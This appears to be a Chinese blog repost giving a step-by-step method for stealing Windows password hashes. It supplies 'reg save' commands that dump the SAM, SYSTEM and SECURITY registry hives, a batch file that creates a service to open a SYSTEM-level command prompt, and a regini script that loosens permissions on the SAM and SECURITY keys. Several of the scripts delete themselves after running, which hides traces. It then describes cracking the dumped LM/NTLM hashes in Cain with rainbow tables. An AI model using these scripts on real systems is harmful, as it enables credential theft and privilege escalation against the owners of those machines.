您的位置:首页 > 其它

导出系统注册表抓Hash的思路整理

2012-05-02 15:05 106 查看
首先使用 administrator权限登录,然后使用 reg来保存注册表中 HKLM下的 SECURITY,SAM,SYSTEM,注意这里必须使用 reg的 save选项,export选项是不行的,

reg save hklm\sam sam.hive

reg save hklm\system ystem.hive

reg save hklm\security security.hive

然后把 sam.hive,system.hive,security.hive下载回本地,打开 CAIN,在"Decoders"标签下,点"LSA Secrets", 点"+"来导入 system.hive和 security.hive.

==============================

要破解 LM/NTLM hash,首先点"cracker"标签下的"LM&NTLM hashes",然后点"+",导入 sam.hive,注意由于现在的 win2000以后都默认使用了 syskey,所以还要导入 system.hive中的 syskey的值,然后就可以彩虹表破解了。

==============================

1、以下是TheLostMind的思路

对用户权限要求,默认XP SP3是导出不了的,我本地测试了,但是system权限是可以的,那么咱可以创建一个system权限运行的CMD,然后再导出就OK了。

其他系统上面没测试过,大家自己整吧。

首先创建一个系统权限执行的CMD:

======================StartSystemCmd.bat=========

sc Create systemcmd binPath= "cmd /K start" type= own type= interact

sc start systemcmd

sc delete systemcmd

del %0

=======================END=========================

然后导出文件。

==================SaveReg.bat=======================

@echo off

reg save hklm\sam sam.hive

reg save hklm\system system.hive

reg save hklm\security security.hive

del %0

=====================END============================

然后倒入到CAIN里面破吧。

2、我的思路

有时我们不方便再跳出一个CMD,这时可以利用命令regini.exe修改注册表的访问权限。

首先新建一个文本文件pri.ini,内容如下:

===========pri.ini===================

HKEY_LOCAL_MACHINE\SECURITY [1 17]

HKEY_LOCAL_MACHINE\SAM [1 17]

===================================

然后执行 regini.exe pri.ini

写成批处理的内容如下:

================================

echo HKEY_LOCAL_MACHINE\SECURITY [1 17]>pri.ini

echo HKEY_LOCAL_MACHINE\SAM [1 17]>>pri.ini

regini.exe pri.ini

del pri.ini

================================

注:以上操作是将hklm\security与hklm\sam赋予Administrators和System完全访问的权限。hklm\system一般对管理员是放开访问的,可视情况修改。以上两个表项对系统登陆至关重要,请谨慎修改。

最后就可以直接利用reg导出注册表内容。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: